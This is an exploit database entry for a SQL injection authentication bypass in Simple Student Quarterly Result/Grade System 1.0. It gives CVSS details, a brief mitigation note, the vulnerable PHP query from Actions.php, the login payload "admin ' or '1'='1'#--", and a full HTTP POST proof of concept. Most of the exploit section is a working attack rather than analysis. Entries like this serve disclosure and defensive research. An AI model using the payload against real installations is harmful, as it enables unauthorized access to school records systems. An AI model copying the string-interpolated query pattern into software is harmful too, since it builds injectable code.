Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass

vendor:

Simple Student Quarterly Result/Grade System

by:

Saud Alenazi

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Student Quarterly Result/Grade System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:simple_student_quarterly_result/grade_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: XAMPP, Linux

2022

Simple Student Quarterly Result/Grade System 1.0 – SQLi Authentication Bypass

A SQL injection vulnerability exists in the Simple Student Quarterly Result/Grade System 1.0, due to improper sanitization of user-supplied input in the 'username' parameter of the 'Actions.php' script. An attacker can exploit this vulnerability to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to modify the intended SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 




# Vulnerable Code

line 57 in file "/sqgs/Actions.php"

@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];


Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php

Payload:

username: admin ' or '1'='1'#--
password: \



Proof of Concept :

POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v

username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi